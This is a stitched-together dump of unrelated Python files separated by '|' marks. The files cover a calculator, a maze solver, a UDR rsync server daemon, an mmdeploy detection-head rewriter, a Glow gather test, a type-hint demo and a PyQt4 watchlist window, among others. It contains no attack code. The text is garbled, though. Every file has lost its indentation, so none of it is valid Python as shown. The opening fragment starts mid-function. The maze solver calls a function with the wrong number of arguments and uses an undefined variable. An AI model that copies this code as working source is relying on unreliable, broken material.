Slacker.send_code("Exception encountered", exception_encountered)
with open(join(getcwd(), "traceback.txt"), mode="w") as file:
traceback.print_exc(file=file)
return
|
class PriceInfo(object):
def __init__(self, curr_trend, trend_today, trend_30, trend_90, trend_180, osbuddy_price):
self.curr_trend = curr_trend
self.trend_today = trend_today
self.trend_30 = trend_30
self.trend_90 = trend_90
self.trend_180 = trend_180
self.osbuddy_price = osbuddy_price
def price(self):
if not self.osbuddy_price:
return self.curr_trend.price
return self.osbuddy_price |
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# Runs the Microsoft Message Compiler (mc.exe). This Python adapter is for the
# GN build, which can only run Python and not native binaries.
#
# Usage: message_compiler.py <environment_file> [<args to mc.exe>*]
import subprocess
import sys
# Read the environment block from the file. This is stored in the format used
# by CreateProcess. Drop last 2 NULs, one for list terminator, one for trailing
# vs. separator.
env_pairs = open(sys.argv[1]).read()[:-2].split('\0')
env_dict = dict([item.split('=', 1) for item in env_pairs])
# mc writes to stderr, so this explicitly redirects to stdout and eats it.
try:
# This needs shell=True to search the path in env_dict for the mc executable.
subprocess.check_output(["mc.exe"] + sys.argv[2:],
env=env_dict,
stderr=subprocess.STDOUT,
shell=True)
except subprocess.CalledProcessError as e:
print e.output
sys.exit(e.returncode)
|
# -*- coding: utf-8 -*-
"""
Created on Sat Jul 6 16:02:49 2019
@author: KuroAzai
"""
import Calculator
def LessThanSix(calc,ops):
print(calc[1])
if calc[1] == ops[0]:
result = Calculator.Addition(calc[0],calc[2])
print("Add" , result)
elif calc[1] == ops[1]:
result = Calculator.Subtraction(calc[0],calc[2])
print("Sub" , result )
elif calc[1] == ops[2]:
result = Calculator.Multiplication(calc[0],calc[2])
print("Mult" , result)
elif calc[1] == ops[3]:
result = Calculator.Division(calc[0],calc[2])
print("Div" , result)
else:
print("404 Jutsu Not found nani ")
return result
def GreaterThanSix(calc):
pass
def calculate(calc):
ops = ['+','-','*','/']
# Using 0.429/ 0.43 we can find the number of operators that are within our list
print("Number of operators" , round(len(calc) * 0.43))
size = round(len(calc) * 0.43)
print(size)
#Step 1
'''
Setting a variable that we will iterate over our Operators in our list.
our operators will always be even numbers and our numbers will be odd numbers.
so will be incremented by + 2 but for the initial operator is at index 1(2 - 1).
'''
n = 3
#Initialise a vairable to store our result
result = 0
step = 0
#Parameters for our Numbers
'''
Our numbers will be on odd numbers(1,3,5...) .
our intial step will calculate the first 2 values then add the next value.
calc = [5,'*',10, '+', 15, '+' ,20, '+', 25]
With the above example after step one the 5th element will be added.
so our Y variable will be 5 - 1 = 4 . Then we will the increment to increase it by +2
'''
y = 4
print(len(calc))
if len(calc) < 5 :
print("less than")
return LessThanSix(calc,ops)
#return "potato"
while size > 0:
print("\nStep", step)
#STEP 1 conditions
if step == 0 :
if calc[1] == ops[0]:
result = Calculator.Addition(calc[0],calc[2])
print("Add" , result, calc[y])
elif calc[1] == ops[1]:
result = Calculator.Subtraction(calc[0],calc[2])
print("Sub" , result )
elif calc[1] == ops[2]:
result = Calculator.Multiplication(calc[0],calc[2])
print("Mult" , result)
elif calc[1] == ops[3]:
result = Calculator.Division(calc[0],calc[2])
print("Div" , result)
else:
print("404 Jutsu Not found nani ", calc[n])
else:
if calc[n] == ops[0]:
result = Calculator.Addition(result,calc[y])
print("Add", result , calc[y])
elif calc[n] == ops[1] :
result = Calculator.Subtraction(result,calc[y])
print("Sub", result )
elif calc[n] == ops[2] :
result = Calculator.Multiplication(result,calc[y])
print("Mult", result)
elif calc[n] == ops[3] :
result = Calculator.Division(result,calc[y])
print("Div", result)
else:
print("404 Jutsu Not found what", calc[n], "n =", n )
y += 2
n += 2
size -= 1
step += 1
return result
|
from sql_helper import MySqlHelper
class Admin(object):
def __init__(self):
self.__helper = MySqlHelper()
def get_table_servers(self):#查询servers表
sql="select * from servers"
params = None
return self.__helper.Get_Dict(sql,params)
def get_table_users(self):#查询users表
sql="select * from users"
params = None
return self.__helper.Get_Dict(sql,params)
def get_user_id(self,username):#查询user表里面的用户id
sql="select users.id from users where users.name=%s"
params = (username,)
return self.__helper.Get_One(sql,params)
def get_user_servers(self,userid):#多对多表查询,找出此用户能够登录哪几台服务器。
sql="select users.name,servers.server_ip from action_list,servers,users where users.id=action_list.user_id and servers.id=action_list.server_id and users.id=%s"
params=(userid,)
return self.__helper.Get_Dict(sql,params)
def insert_record(self,r_name,r_time,r_ip,r_log):#记录用户登录服务器里的操作命令
sql='insert into record(name,time,ip,log) values(%s,%s,%s,%s)'
params=(r_name,r_time,r_ip,r_log)
self.__helper.Insert_one(sql,params)
|
matriz = [list(linea)[-1] for linea in open("Laberinto.txt").readlines()]
class Nodo():
def __init__(self,valor,posicion,hijos=[]):
self.valor=valor
self.posicion = posicion
self.hijos=hijos
def agregarHijo(self,hijo):
self.hijos.append(hijo)
def setPosicion(self,posicion):
self.posicion=posicion
def setHijos(self,hijos):
self.hijos=hijos
def buscar(arbol,posicion):
if arbol==None:
return False
if arbol.posicion==posicion:
return True
return buscar_hijos(arbol.hijos,posicion)
def buscar_hijos(hijos,posicion):
if hijos==[]:
return False
return buscar(hijos[0],posicion) or buscar_hijos(hijos[1:],posicion)
def buscarValor(arbol,valor):
if arbol==None:
return False
if arbol.valor==valor:
return True
return buscar_hijosValor(arbol.hijos,valor)
def buscar_hijosValor(hijos,valor):
if hijos==[]:
return False
return buscarValor(hijos[0],valor) or buscar_hijosValor(hijos[1:],valor)
def imprimir(arbol):
if(arbol==None):
print("None")
else:
print(arbol.posicion)
if(len(arbol.hijos)>0):
for i in arbol.hijos:
imprimir(i)
def buscarX(laberinto):
for x in laberinto:
for y in range(len(x)):
if x[y] == "x":
colocarArbol(laberinto.index(x),y,laberinto, Nodo(0,0,[]))
def colocarArbol(x,y):
raiz.setPosicion((x,y))
arbol.setPosicion((x,y))
raiz.setHijos([verificarIzquierda(x,y,arbol),verificarAbajo(x,y,arbol),verificarArriba(x,y,arbol),verificarDerecha(x,y,arbol)])
def verificarDerecha(x,y,nodo):
print((x,y),"→")
if(y+1<=len(matriz[x])-1 and matriz[x][y+1]!=1):
if(buscar(nodo,(x,y+1))!=True):
nodo.agregarHijo(Nodo(matriz[x][y+1],(x,y+1),[]))
return Nodo(matriz[x][y+1],(x,y+1),[verificarAbajo(x,y+1,nodo),verificarArriba(x,y+1,nodo),verificarIzquierda(x,y+1,nodo),verificarDerecha(x,y+1,nodo)])
else:
return None
else:
return None
def verificarIzquierda(x,y,nodo):
print((x,y),"←")
if(y-1>=0 and matriz[x][y-1]!=1):
if(buscar(nodo,(x,y-1))!=True):
nodo.agregarHijo(Nodo(matriz[x][y-1],(x,y-1),[]))
return Nodo(matriz[x][y-1],(x,y-1),[verificarAbajo(x,y-1,nodo),verificarArriba(x,y-1,nodo),verificarIzquierda(x,y-1,nodo),verificarDerecha(x,y-1,nodo)])
else:
return None
else:
return None
def verificarAbajo(x,y,nodo):
print((x,y),"↓")
if(x+1<=len(matriz)-1 and matriz[x+1][y]!=1):
if(buscar(nodo,(x+1,y))!=True):
nodo.agregarHijo(Nodo(matriz[x+1][y],(x+1,y),[]))
return Nodo(matriz[x+1][y],(x+1,y),[verificarAbajo(x+1,y,nodo),verificarArriba(x+1,y,nodo),verificarIzquierda(x+1,y,nodo),verificarDerecha(x+1,y,nodo)])
else:
return None
else:
return None
def verificarArriba(x,y,nodo):
print((x,y),"↑")
if(x-1>=0 and matriz[x-1][y]!=1):
if(buscar(nodo,(x-1,y))!=True):
nodo.agregarHijo(Nodo(matriz[x-1][y],(x-1,y),[]))
return Nodo(matriz[x-1][y],(x-1,y),[verificarAbajo(x-1,y,nodo),verificarArriba(x-1,y,nodo),verificarIzquierda(x-1,y,nodo),verificarDerecha(x-1,y,nodo)])
else:
return None
else:
return None
print(matriz[0])
print(matriz[1])
print(matriz[2])
print(matriz[3])
print(matriz[4])
print(matriz[5])
buscarX(matriz)
if(buscarValor(raiz,"y")==True):
print("Si tiene solución")
else:
print("No tiene solución")
|
from .models import PartClass
def full_part_number_to_broken_part(part_number):
part_class = PartClass.objects.filter(code=part_number[:3])[0]
part_item = part_number[4:8]
part_variation = part_number[9:]
civ = {
'class': part_class,
'item': part_item,
'variation': part_variation
}
return civ
|
#!/usr/bin/env python
# Copyright 2012 Laboratory for Advanced Computing at the University of Chicago
#
# This file is part of UDR.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os, re, sys, pwd, grp, time
import signal, optparse, subprocess, logging
import SocketServer
from daemon import Daemon
class UDRHandler(SocketServer.StreamRequestHandler):
"""
Handler for incoming UDR connections, ignores the UDR command sent and builds it's own
UDR command to run on the server based on the server's configuration.
"""
def handle(self):
logging.info('New connection from %s' % self.client_address[0])
#depends on the udr cmd having a newline at the end
#perhaps should add a timeout, or maybe none at all
line = self.rfile.readline().strip()
if not line:
logging.warning('Connection problem, did not receive udr command from client')
else:
udr_cmd = []
udr_cmd.append(self.server.params['udr'])
udr_cmd.append('-x')
udr_cmd.append('--config')
udr_cmd.append(self.server.params['rsyncd conf'])
if self.server.params['verbose']:
udr_cmd.append('-v')
if 'gid' in self.server.rsync_params:
udr_cmd.append('--rsync-gid')
if not self.server.rsync_params['gid'].isdigit():
udr_cmd.append(str(grp.getgrnam(self.server.rsync_params['gid']).gr_gid))
else:
udr_cmd.append(self.server.rsync_params['gid'])
if 'uid' in self.server.rsync_params:
udr_cmd.append('--rsync-uid')
if not self.server.rsync_params['uid'].isdigit():
udr_cmd.append(str(pwd.getpwnam(self.server.rsync_params['uid']).pw_uid))
else:
udr_cmd.append(self.server.rsync_params['uid'])
udr_cmd.append('-a')
udr_cmd.append(self.server.params['start port'])
udr_cmd.append('-b')
udr_cmd.append(self.server.params['end port'])
udr_cmd.append('-t')
udr_cmd.append('rsync')
logging.debug('UDR cmd: %s' % udr_cmd)
try:
signal.signal(signal.SIGCHLD,signal.SIG_IGN)
udr_proc = subprocess.Popen(udr_cmd, stdout=subprocess.PIPE, stdin=subprocess.PIPE)
firstline = udr_proc.stdout.readline()
logging.debug('firstline: ' + firstline)
logging.info('providing port %s for UDR to %s' % (firstline.split()[0], self.client_address[0]))
self.wfile.write(firstline)
except OSError, err:
logging.critical('%s, cmd: %s, exiting.' % (' '.join(udr_cmd), err.strerror))
sys.exit(1)
class UDRServer(Daemon, object):
"""
Server daemon containing methods to handle the configuration, logging and setting uid/gid
when appropriate
"""
def __init__(self, configfile, verbose=False):
self.params = {}
self.params['verbose'] = verbose
self.params['udr'] = 'udr'
self.params['start port'] = '9000'
self.params['end port'] = '9100'
self.params['address'] = '0.0.0.0'
self.params['server port'] = 9000
self.params['rsyncd conf'] = '/etc/rsyncd.conf'
self.params['pid file'] = '/var/run/udrd.pid'
self.params['log file'] = ''.join([os.getcwd(), '/udr.log'])
self.parse_conf(configfile, self.params)
#check that rsyncd.conf exists, otherwise rsync fails silently
self.rsync_params = {}
self.parse_conf(self.params['rsyncd conf'], self.rsync_params)
super(UDRServer, self).__init__(pidfile=self.params['pid file'], stdout=self.params['log file'], stderr=self.params['log file'])
def run(self):
self.set_uid_gid()
self.config_logger()
SocketServer.TCPServer.allow_reuse_address = True
server = SocketServer.TCPServer((self.params['address'], int(self.params['server port'])), UDRHandler)
server.params = self.params
server.rsync_params = self.rsync_params
logging.debug('params: %s' % str(self.params))
logging.info('UDR server started on %s %s' % (self.params['address'], self.params['server port']))
server.serve_forever()
def set_uid_gid(self):
if 'gid' in self.params:
if self.params['gid'].isdigit():
os.setgid(int(self.params['gid']))
else:
gid = grp.getgrnam(self.params['gid']).gr_gid
os.setgid(gid)
else:
if os.getegid() == 0:
os.setgid(grp.getgrnam('nogroup').gr_gid)
if 'uid' in self.params:
if self.params['uid'].isdigit():
os.setuid(int(self.params['uid']))
else:
uid = pwd.getpwnam(self.params['uid']).pw_uid
os.setuid(uid)
else:
if os.geteuid() == 0:
os.setuid(pwd.getpwnam('nobody').pw_uid)
def read_lines(self, filename):
linefile = open(filename)
lines = []
for line in linefile:
line = line.strip()
lines.append(line)
if not line.endswith("\\"):
yield "".join(lines)
lines = []
if len(lines) > 0:
yield "".join(lines)
def parse_conf(self, filename, param_dict):
paren_re = re.compile(r'\[(\w+)\]')
eq_re = re.compile(r'(.+)=(.+)')
for line in self.read_lines(filename):
line = line.strip()
if line.startswith('#'):
continue
paren_result = paren_re.match(line)
if paren_result is not None:
curr_module = paren_result.group(1)
break
eq_result = eq_re.match(line)
if eq_result is not None:
key = eq_result.group(1).strip()
value = eq_result.group(2).strip()
param_dict[key] = value
def config_logger(self):
logger = logging.getLogger()
handler = logging.FileHandler(self.params['log file'])
formatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s')
handler.setFormatter(formatter)
logger.addHandler(handler)
if 'log level' in self.params:
logger.setLevel(getattr(logging, self.params['log level'].upper()))
else:
logger.setLevel(logging.INFO)
def main():
"""
Parses server options and start|stop|restart|foreground UDRServer daemon
"""
parser = optparse.OptionParser()
parser.add_option('-c', '--config', dest='config', help='UDR server config file')
parser.add_option('-v', '--verbose', action='store_true', dest='verbose', default=False)
parser.add_option('-s', '--silent', action='store_true', dest='silent', default=False)
(options, args) = parser.parse_args()
if options.config:
configfile = options.config
else:
configfile = '/etc/udrd.conf'
daemon = UDRServer(configfile, options.verbose)
if len(sys.argv) > 1:
if 'start' == sys.argv[-1]:
if not options.silent:
sys.stderr.write('Starting UDR server\n')
daemon.start()
elif 'stop' == sys.argv[-1]:
if not options.silent:
sys.stderr.write('Stopping UDR server\n')
daemon.stop()
elif 'restart' == sys.argv[-1]:
if not options.silent:
sys.stderr.write('Stopping UDR server\n')
daemon.stop()
time.sleep(2)
if not options.silent:
sys.stderr.write('Starting UDR server\n')
daemon.start()
elif 'foreground' == sys.argv[-1]:
daemon.run()
else:
print "usage: %s [options] start|stop|restart|foreground" % sys.argv[0]
sys.exit(2)
sys.exit(0)
else:
print "usage: %s [options] start|stop|restart|foreground" % sys.argv[0]
sys.exit(2)
if __name__ == '__main__':
main()
|
# Copyright (c) OpenMMLab. All rights reserved.
from typing import Sequence
import torch
from mmdeploy.codebase.mmdet import (get_post_processing_params,
multiclass_nms,
pad_with_value_if_necessary)
from mmdeploy.core import FUNCTION_REWRITER
from mmdeploy.utils import is_dynamic_shape
def _bbox_pre_decode(points: torch.Tensor, bbox_pred: torch.Tensor,
stride: torch.Tensor):
"""compute real bboxes."""
points = points[..., :2]
bbox_pos_center = torch.cat([points, points], dim=-1)
bboxes = bbox_pred * stride + bbox_pos_center
return bboxes
def _bbox_post_decode(bboxes: torch.Tensor, max_shape: Sequence[int]):
"""clamp bbox."""
x1 = bboxes[..., 0].clamp(min=0, max=max_shape[1])
y1 = bboxes[..., 1].clamp(min=0, max=max_shape[0])
x2 = bboxes[..., 2].clamp(min=0, max=max_shape[1])
y2 = bboxes[..., 3].clamp(min=0, max=max_shape[0])
decoded_bboxes = torch.stack([x1, y1, x2, y2], dim=-1)
return decoded_bboxes
@FUNCTION_REWRITER.register_rewriter(
'mmdet.models.dense_heads.RepPointsHead.points2bbox')
def reppoints_head__points2bbox(ctx, self, pts, y_first=True):
"""Rewrite of `points2bbox` in `RepPointsHead`.
Use `self.moment_transfer` in `points2bbox` will cause error:
RuntimeError: Input, output and indices must be on the current device
"""
moment_transfer = self.moment_transfer
delattr(self, 'moment_transfer')
self.moment_transfer = torch.tensor(moment_transfer.data)
ret = ctx.origin_func(self, pts, y_first=y_first)
self.moment_transfer = moment_transfer
return ret
@FUNCTION_REWRITER.register_rewriter(
'mmdet.models.dense_heads.RepPointsHead.get_bboxes')
def reppoints_head__get_bboxes(ctx,
self,
cls_scores,
bbox_preds,
score_factors=None,
img_metas=None,
cfg=None,
rescale=None,
**kwargs):
"""Rewrite `get_bboxes` of `RepPointsHead` for default backend.
Rewrite this function to deploy model, transform network output for a
batch into bbox predictions.
Args:
ctx (ContextCaller): The context with additional information.
self (RepPointsHead): The instance of the class RepPointsHead.
cls_scores (list[Tensor]): Box scores for each scale level
with shape (N, num_anchors * num_classes, H, W).
bbox_preds (list[Tensor]): Box energies / deltas for each scale
level with shape (N, num_anchors * 4, H, W).
score_factors (list[Tensor], Optional): Score factor for
all scale level, each is a 4D-tensor, has shape
(batch_size, num_priors * 1, H, W). Default None.
img_metas (list[dict]): Meta information of the image, e.g.,
image size, scaling factor, etc.
cfg (mmcv.Config | None): Test / postprocessing configuration,
if None, test_cfg would be used. Default: None.
rescale (bool): If True, return boxes in original image space.
Default: False.
Returns:
tuple[Tensor, Tensor]: tuple[Tensor, Tensor]: (dets, labels),
`dets` of shape [N, num_det, 5] and `labels` of shape
[N, num_det].
"""
deploy_cfg = ctx.cfg
is_dynamic_flag = is_dynamic_shape(deploy_cfg)
num_levels = len(cls_scores)
featmap_sizes = [featmap.size()[-2:] for featmap in cls_scores]
mlvl_priors = self.prior_generator.grid_priors(
featmap_sizes, dtype=bbox_preds[0].dtype, device=bbox_preds[0].device)
mlvl_priors = [priors.unsqueeze(0) for priors in mlvl_priors]
mlvl_cls_scores = [cls_scores[i].detach() for i in range(num_levels)]
mlvl_bbox_preds = [bbox_preds[i].detach() for i in range(num_levels)]
assert img_metas is not None
img_shape = img_metas[0]['img_shape']
assert len(cls_scores) == len(bbox_preds) == len(mlvl_priors)
batch_size = cls_scores[0].shape[0]
cfg = self.test_cfg
pre_topk = cfg.get('nms_pre', -1)
mlvl_valid_bboxes = []
mlvl_valid_scores = []
for level_idx, (cls_score, bbox_pred, priors) in enumerate(
zip(mlvl_cls_scores, mlvl_bbox_preds, mlvl_priors)):
assert cls_score.size()[-2:] == bbox_pred.size()[-2:]
scores = cls_score.permute(0, 2, 3, 1).reshape(batch_size, -1,
self.cls_out_channels)
if self.use_sigmoid_cls:
scores = scores.sigmoid()
else:
scores = scores.softmax(-1)
bbox_pred = bbox_pred.permute(0, 2, 3, 1).reshape(batch_size, -1, 4)
if not is_dynamic_flag:
priors = priors.data
if pre_topk > 0:
priors = pad_with_value_if_necessary(priors, 1, pre_topk)
bbox_pred = pad_with_value_if_necessary(bbox_pred, 1, pre_topk)
scores = pad_with_value_if_necessary(scores, 1, pre_topk, 0.)
nms_pre_score = scores
# Get maximum scores for foreground classes.
if self.use_sigmoid_cls:
max_scores, _ = nms_pre_score.max(-1)
else:
max_scores, _ = nms_pre_score[..., :-1].max(-1)
_, topk_inds = max_scores.topk(pre_topk)
batch_inds = torch.arange(
batch_size, device=bbox_pred.device).unsqueeze(-1)
prior_inds = batch_inds.new_zeros((1, 1))
priors = priors[prior_inds, topk_inds, :]
bbox_pred = bbox_pred[batch_inds, topk_inds, :]
scores = scores[batch_inds, topk_inds, :]
bbox_pred = _bbox_pre_decode(priors, bbox_pred,
self.point_strides[level_idx])
mlvl_valid_bboxes.append(bbox_pred)
mlvl_valid_scores.append(scores)
batch_mlvl_bboxes_pred = torch.cat(mlvl_valid_bboxes, dim=1)
batch_scores = torch.cat(mlvl_valid_scores, dim=1)
batch_bboxes = _bbox_post_decode(
bboxes=batch_mlvl_bboxes_pred, max_shape=img_shape)
if not self.use_sigmoid_cls:
batch_scores = batch_scores[..., :self.num_classes]
post_params = get_post_processing_params(deploy_cfg)
max_output_boxes_per_class = post_params.max_output_boxes_per_class
iou_threshold = cfg.nms.get('iou_threshold', post_params.iou_threshold)
score_threshold = cfg.get('score_thr', post_params.score_threshold)
pre_top_k = post_params.pre_top_k
keep_top_k = cfg.get('max_per_img', post_params.keep_top_k)
return multiclass_nms(
batch_bboxes,
batch_scores,
max_output_boxes_per_class,
iou_threshold=iou_threshold,
score_threshold=score_threshold,
pre_top_k=pre_top_k,
keep_top_k=keep_top_k)
|
import torch
from tests import utils
class GatherModule(torch.nn.Module):
def __init__(self, dimension):
super(GatherModule, self).__init__()
self.dimension = dimension
def forward(self, tensor, index):
return torch.gather(tensor, self.dimension, index)
class TestGather(utils.TorchGlowTestCase):
@utils.deterministic_expand(
[
lambda: (
"basic-1dim",
torch.tensor([1, 2, 3, 4]),
0,
torch.tensor([0, 0, 1, 0]),
),
lambda: (
"0-dim",
torch.tensor([[1, 2], [3, 4]]),
0,
torch.tensor([[0, 1], [0, 1]]),
),
lambda: (
"1-dim",
torch.tensor([[1, 2], [3, 4]]),
1,
torch.tensor([[0, 0], [0, 0]]),
),
lambda: (
"2-dim",
torch.randn(3, 4, 2),
2,
torch.empty(3, 4, 2).random_(2).long(),
),
]
)
def test_gather(self, _, tensor, dimension, index):
utils.compare_tracing_methods(
GatherModule(dimension),
tensor,
index,
skip_to_glow=True,
fusible_ops={"aten::gather"},
)
|
# coding: utf-8
from .link import Link
from .statistics import ImportStatistics
|
import math
""" 今天看了一篇Python的文章,才发现还有这种写法,这基本上和Swift没什么区别了 """
def swiftStyle():
""" 一个Swift风格的函数表达式 """
a: str = "aa"
b: int = 1
# 虽然a被定义成了str类型,但是这里还是可以对a赋值2,并且不会报错,print也没什么异常
a = 2
print(a)
isinstance(a, int)
# 参数和返回标注了类型,那么接下来调用时就能进行提示
def example(a: str) -> str:
return f"Hello {a}"
print(example(a = "world"))
# 一些简单的标注,看起来起不到效果,但如果换个有含义的名字呢
User = str
Age = int
Answer = str
Location = (float, float)
Distance = float
def distanceBetweenPoint1(point, toPoint):
x1, y1 = toPoint
x2, y2 = point
dx = x1 - x2
dy = y1 - y2
distance = math.sqrt(dx * dx + dy * dy) # (dx * dx + dy * dy) ** 0.5
return distance
def distanceBetweenPoint2(point: Location, toPoint: Location):
x1, y1 = toPoint
x2, y2 = point
dx = x1 - x2
dy = y1 - y2
distance = math.sqrt(dx * dx + dy * dy)
return distance
def distanceBetweenPoint3(point: Location, toPoint: Location) -> Distance:
x1, y1 = toPoint
x2, y2 = point
dx = x1 - x2
dy = y1 - y2
distance = math.sqrt(dx * dx + dy * dy)
return distance
def say_hello(u: User) -> Answer:
""" 输入用户信息,返回回答 """
return f"Hello {u}"
print(say_hello("Shadow"))
distance1 = distanceBetweenPoint1((0, 2), (5, 7))
print(distance1)
distance2 = distanceBetweenPoint2(point=(0, 2), toPoint=(5, 7))
print(distance2)
distance3 = distanceBetweenPoint3(point=(0, 2), toPoint=(5, 7))
print(distance3)
# 这么写会崩溃
#distance4 = distanceBetweenPoint3(point="haha", toPoint="hehe")
#print(distance4)
if __name__ == "__main__":
swiftStyle() |
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'exampleWatchlist.ui'
#
# Created by: PyQt4 UI code generator 4.11.4
#
# WARNING! All changes made in this file will be lost!
# This code is to be used as a reference for the code for generating the watchlist
# window when a user loads their watchlist file
from PyQt4 import QtCore, QtGui
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
def _fromUtf8(s):
return s
try:
_encoding = QtGui.QApplication.UnicodeUTF8
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig)
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName(_fromUtf8("MainWindow"))
MainWindow.resize(800, 600)
self.centralwidget = QtGui.QWidget(MainWindow)
self.centralwidget.setObjectName(_fromUtf8("centralwidget"))
self.horizontalLayoutWidget = QtGui.QWidget(self.centralwidget)
self.horizontalLayoutWidget.setGeometry(QtCore.QRect(-1, -1, 801, 551))
self.horizontalLayoutWidget.setObjectName(_fromUtf8("horizontalLayoutWidget"))
self.horizontalLayout_2 = QtGui.QHBoxLayout(self.horizontalLayoutWidget)
self.horizontalLayout_2.setObjectName(_fromUtf8("horizontalLayout_2"))
self.scrollArea = QtGui.QScrollArea(self.horizontalLayoutWidget)
self.scrollArea.setWidgetResizable(True)
self.scrollArea.setObjectName(_fromUtf8("scrollArea"))
self.scrollAreaWidgetContents = QtGui.QWidget()
self.scrollAreaWidgetContents.setGeometry(QtCore.QRect(0, 0, 130, 547))
self.scrollAreaWidgetContents.setObjectName(_fromUtf8("scrollAreaWidgetContents"))
self.verticalLayoutWidget = QtGui.QWidget(self.scrollAreaWidgetContents)
self.verticalLayoutWidget.setGeometry(QtCore.QRect(-1, -1, 131, 551))
self.verticalLayoutWidget.setObjectName(_fromUtf8("verticalLayoutWidget"))
self.verticalLayout_3 = QtGui.QVBoxLayout(self.verticalLayoutWidget)
self.verticalLayout_3.setObjectName(_fromUtf8("verticalLayout_3"))
self.pushButton = QtGui.QPushButton(self.verticalLayoutWidget)
self.pushButton.setObjectName(_fromUtf8("pushButton"))
self.verticalLayout_3.addWidget(self.pushButton)
self.pushButton_2 = QtGui.QPushButton(self.verticalLayoutWidget)
self.pushButton_2.setObjectName(_fromUtf8("pushButton_2"))
self.verticalLayout_3.addWidget(self.pushButton_2)
self.pushButton_3 = QtGui.QPushButton(self.verticalLayoutWidget)
self.pushButton_3.setObjectName(_fromUtf8("pushButton_3"))
self.verticalLayout_3.addWidget(self.pushButton_3)
self.pushButton_4 = QtGui.QPushButton(self.verticalLayoutWidget)
self.pushButton_4.setObjectName(_fromUtf8("pushButton_4"))
self.verticalLayout_3.addWidget(self.pushButton_4)
self.pushButton_5 = QtGui.QPushButton(self.verticalLayoutWidget)
self.pushButton_5.setObjectName(_fromUtf8("pushButton_5"))
self.verticalLayout_3.addWidget(self.pushButton_5)
self.pushButton_6 = QtGui.QPushButton(self.verticalLayoutWidget)
self.pushButton_6.setObjectName(_fromUtf8("pushButton_6"))
self.verticalLayout_3.addWidget(self.pushButton_6)
spacerItem = QtGui.QSpacerItem(20, 40, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
self.verticalLayout_3.addItem(spacerItem)
self.scrollArea.setWidget(self.scrollAreaWidgetContents)
self.horizontalLayout_2.addWidget(self.scrollArea)
self.scrollArea_2 = QtGui.QScrollArea(self.horizontalLayoutWidget)
self.scrollArea_2.setWidgetResizable(True)
self.scrollArea_2.setObjectName(_fromUtf8("scrollArea_2"))
self.scrollAreaWidgetContents_3 = QtGui.QWidget()
self.scrollAreaWidgetContents_3.setGeometry(QtCore.QRect(0, 0, 659, 547))
self.scrollAreaWidgetContents_3.setObjectName(_fromUtf8("scrollAreaWidgetContents_3"))
self.verticalLayoutWidget_2 = QtGui.QWidget(self.scrollAreaWidgetContents_3)
self.verticalLayoutWidget_2.setGeometry(QtCore.QRect(-1, -1, 661, 551))
self.verticalLayoutWidget_2.setObjectName(_fromUtf8("verticalLayoutWidget_2"))
self.verticalLayout_4 = QtGui.QVBoxLayout(self.verticalLayoutWidget_2)
self.verticalLayout_4.setObjectName(_fromUtf8("verticalLayout_4"))
self.label = QtGui.QLabel(self.verticalLayoutWidget_2)
self.label.setObjectName(_fromUtf8("label"))
self.verticalLayout_4.addWidget(self.label)
self.label_2 = QtGui.QLabel(self.verticalLayoutWidget_2)
self.label_2.setObjectName(_fromUtf8("label_2"))
self.verticalLayout_4.addWidget(self.label_2)
self.label_3 = QtGui.QLabel(self.verticalLayoutWidget_2)
self.label_3.setObjectName(_fromUtf8("label_3"))
self.verticalLayout_4.addWidget(self.label_3)
self.label_4 = QtGui.QLabel(self.verticalLayoutWidget_2)
self.label_4.setObjectName(_fromUtf8("label_4"))
self.verticalLayout_4.addWidget(self.label_4)
self.label_5 = QtGui.QLabel(self.verticalLayoutWidget_2)
self.label_5.setObjectName(_fromUtf8("label_5"))
self.verticalLayout_4.addWidget(self.label_5)
self.label_6 = QtGui.QLabel(self.verticalLayoutWidget_2)
self.label_6.setObjectName(_fromUtf8("label_6"))
self.verticalLayout_4.addWidget(self.label_6)
spacerItem1 = QtGui.QSpacerItem(20, 40, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
self.verticalLayout_4.addItem(spacerItem1)
self.scrollArea_2.setWidget(self.scrollAreaWidgetContents_3)
self.horizontalLayout_2.addWidget(self.scrollArea_2)
self.horizontalLayout_2.setStretch(0, 1)
self.horizontalLayout_2.setStretch(1, 5)
MainWindow.setCentralWidget(self.centralwidget)
self.menubar = QtGui.QMenuBar(MainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 800, 25))
self.menubar.setObjectName(_fromUtf8("menubar"))
self.menuFile = QtGui.QMenu(self.menubar)
self.menuFile.setObjectName(_fromUtf8("menuFile"))
MainWindow.setMenuBar(self.menubar)
self.statusbar = QtGui.QStatusBar(MainWindow)
self.statusbar.setObjectName(_fromUtf8("statusbar"))
MainWindow.setStatusBar(self.statusbar)
self.actionOpen = QtGui.QAction(MainWindow)
self.actionOpen.setObjectName(_fromUtf8("actionOpen"))
self.actionSave = QtGui.QAction(MainWindow)
self.actionSave.setObjectName(_fromUtf8("actionSave"))
self.actionQuit = QtGui.QAction(MainWindow)
self.actionQuit.setObjectName(_fromUtf8("actionQuit"))
self.menuFile.addAction(self.actionOpen)
self.menuFile.addAction(self.actionSave)
self.menuFile.addAction(self.actionQuit)
self.menubar.addAction(self.menuFile.menuAction())
# The following is our hand-typed code within the designer generated constructor method
# When the Quit action from menu bar is clicked or the shortcut is entered,
# close the watchlist window
self.actionQuit.triggered.connect(MainWindow.close)
self.actionOpen.triggered.connect(self.openWatchlist)
# When the Open action from menu bar is clicked or the shortcut is entered,
# get the path of the watchlist file via a QFileDialog
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
MainWindow.setWindowTitle(_translate("MainWindow", "Movie Information - Watchlist", None))
